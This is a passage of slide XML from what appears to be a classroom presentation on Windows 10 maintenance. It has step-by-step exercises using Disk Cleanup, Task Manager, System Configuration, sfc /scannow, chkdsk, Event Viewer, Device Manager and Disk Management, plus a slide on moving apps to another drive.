          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="312" name="Google Shape;312;p25"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4994700" y="1647275"/>
            <a:ext cx="2920650" cy="29206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26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1617825" y="422850"/>
            <a:ext cx="59082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6"/>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47</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="319" name="Google Shape;319;p26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3414025" y="295400"/>
            <a:ext cx="3134400" cy="613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a:t>
            </a:r>
            <a:endParaRPr sz="3000" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
              <a:latin typeface="Roboto Slab"/>
              <a:ea typeface="Roboto Slab"/>
              <a:cs typeface="Roboto Slab"/>
              <a:sym typeface="Roboto Slab"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="320" name="Google Shape;320;p26"/>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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838725" y="908900"/>
            <a:ext cx="7254600" cy="3648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00000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Merriweather"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Exercise: Disk Cleanup</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Disk Cleanup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Select the C: drive and check the boxes next to "Temporary files" and "Recycle Bin".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Click "OK" to clean up these files.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and discuss with you friends: How much space did you free up on your computer?</a:t>
            </a:r>
            <a:endParaRPr sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="0" indent="0" algn="just"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a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-323850" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Merriweather"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Exercise: Task Manager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Task Manager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"Processes" tab and sort the list by CPU usage.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Identify the process that is using the most CPU and end the process.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and discuss with you friends: Has your computer's performance improved?</a:t>
            </a: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5"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="326" name="Google Shape;326;p27"/>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7"/>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48</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="328" name="Google Shape;328;p27"/>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29" name="Google Shape;329;p27"/>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7"/>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31" name="Google Shape;331;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="860150" y="780275"/>
            <a:ext cx="7350900" cy="400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00000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Merriweather"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Exercise: System Configuration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System Configuration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"Services" tab and uncheck the "Print Spooler" service.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"Startup" tab and uncheck the "Spotify" program.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Click "OK" to apply the changes and restart your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Has your computer's performance improved?</a:t>
            </a:r>
            <a:endParaRPr sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="0" indent="0" algn="just"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Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-323850" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Merriweather"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Exercise: Windows Memory Diagnostic</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Windows Memory Diagnostic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Select "Restart now and check for problems (recommended)".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Wait for the scan to complete and check for any memory errors that are reported.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Did the tool detect any memory errors on your computer?</a:t>
            </a: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5"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="336" name="Google Shape;336;p28"/>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8"/>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49</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="338" name="Google Shape;338;p28"/>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39" name="Google Shape;339;p28"/>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8"/>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41" name="Google Shape;341;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="860150" y="780275"/>
            <a:ext cx="7350900" cy="40620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000000"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Merriweather"/>
              <a:buAutoNum type="arabicPeriod" startAt="5"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Exercise: Windows Update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Windows Update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Check for any available updates and download and install them.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Have any performance or security issues been resolved by the updates?</a:t>
            </a:r>
            <a:endParaRPr sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1100" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-323850" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Merriweather"/>
              <a:buAutoNum type="arabicPeriod" startAt="5"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Exercise: System File Checker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Command Prompt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Type "sfc /scannow" and press Enter to start the System File Checker.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Wait for the scan to complete and check for any corrupted system files that are reported.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Were any corrupted system files repaired by the tool?</a:t>
            </a:r>
            <a:endParaRPr sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="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5</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="186" name="Google Shape;186;p13"/>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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1764000" y="200975"/>
            <a:ext cx="56649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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1926175" y="200975"/>
            <a:ext cx="5502600" cy="879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Moving apps to a different drive in Windows 10</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="189" name="Google Shape;189;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657225" y="1080263"/>
            <a:ext cx="7591200" cy="1169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You can move apps to a different drive by heading to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Start &gt; Settings &gt; System.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t> Next, locate the Apps &amp; Features section. In here, if you click on a program you’ll see a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Move </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>button for those apps which can be moved.</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="190" name="Google Shape;190;p13"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5350775" y="2066175"/>
            <a:ext cx="3311525" cy="2737250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191" name="Google Shape;191;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657225" y="2174350"/>
            <a:ext cx="4532100" cy="1416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Select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Move </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>and Windows will produce a set of available locations you can shift the program to. Choose which one is best and select it; Windows will do the rest. </a:t>
            </a:r>
            <a:endParaRPr sz="16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Google Shape;346;p29"/>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9"/>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50</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="348" name="Google Shape;348;p29"/>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49" name="Google Shape;349;p29"/>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9"/>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51" name="Google Shape;351;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="860150" y="780275"/>
            <a:ext cx="7350900" cy="41328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000000"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Merriweather"/>
              <a:buAutoNum type="arabicPeriod" startAt="7"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Exercise: Disk Check</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Command Prompt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Type "chkdsk C: /f" and press Enter to start the disk check tool.</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Wait for the scan to complete and check for any errors that are reported.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Were any errors detected and fixed by the tool?</a:t>
            </a:r>
            <a:endParaRPr sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="91440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a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-323850" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Merriweather"/>
              <a:buAutoNum type="arabicPeriod" startAt="7"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Exercise: Disk Defragmenter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Disk Defragmenter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Analyze the selected drive for fragmentation.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If fragmentation is detected, click "Optimize" to defragment the drive.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and discuss with you friends: Has your computer's performance improved?</a:t>
            </a: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5"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="356" name="Google Shape;356;p30"/>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0"/>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51</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="358" name="Google Shape;358;p30"/>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59" name="Google Shape;359;p30"/>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30"/>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61" name="Google Shape;361;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="860150" y="780275"/>
            <a:ext cx="7350900" cy="41328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000000"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Merriweather"/>
              <a:buAutoNum type="arabicPeriod" startAt="9"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Exercise: Event Viewer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Event Viewer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"Windows Logs" section and click "System".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Look for any red "Error" messages and identify the source of the problem.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Take appropriate action to resolve the problem.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Have the error messages been resolved?</a:t>
            </a:r>
            <a:endParaRPr sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="91440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a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-323850" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Merriweather"/>
              <a:buAutoNum type="arabicPeriod" startAt="9"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Exercise: Device Manager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Device Manager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Look for any devices with a yellow exclamation mark next to them.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Identify the source of the problem and take appropriate action to resolve it.</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Have the device issues been resolved?</a:t>
            </a:r>
            <a:endParaRPr sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="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6" name="Google Shape;366;p31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1617825" y="223075"/>
            <a:ext cx="5908200" cy="15033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31"/>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52</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="368" name="Google Shape;368;p31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2876100" y="340950"/>
            <a:ext cx="3695400" cy="4311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69" name="Google Shape;369;p31"/>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1"/>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71" name="Google Shape;371;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="624400" y="718475"/>
            <a:ext cx="7350900" cy="43407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00000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Merriweather"/>
              <a:buAutoNum type="arabicPeriod" startAt="11"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Exercise: Disk Management</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Disk Management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Identify any disks or partitions that are not properly configured.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Take appropriate action to reconfigure them, such as creating a new partition or formatting a disk.</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Have the disk or partition issues been resolved?</a:t>
            </a:r>
            <a:endParaRPr sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
              <a:ea typeface="Merriweather"/>
              <a:cs typeface="Merriweather"/>
              <a:sym typeface="Merriweather"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just"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a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-323850" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Merriweather"/>
              <a:buAutoNum type="arabicPeriod" startAt="11"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>Exercise: System Configuration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System Configuration tool on your Windows 10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"Services" tab and select "Hide all Microsoft services".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Identify any unnecessary services and disable them.</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to the "Startup" tab and disable any unnecessary startup programs.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00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and discuss with you friends: Has your computer's performance improved?</a:t>
            </a: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75"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="376" name="Google Shape;376;p32"/>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32"/>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53</a:t>
            </a:fld>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="198754"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="378" name="Google Shape;378;p32"/>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79" name="Google Shape;379;p32"/>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32"/>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81" name="Google Shape;381;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="860150" y="780275"/>
            <a:ext cx="7350900" cy="36018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000000"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Merriweather"/>
              <a:buAutoNum type="arabicPeriod" startAt="13"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>What is safe mode in Windows 10?</a:t>
            </a:r>
            <a:endParaRPr sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather"/>
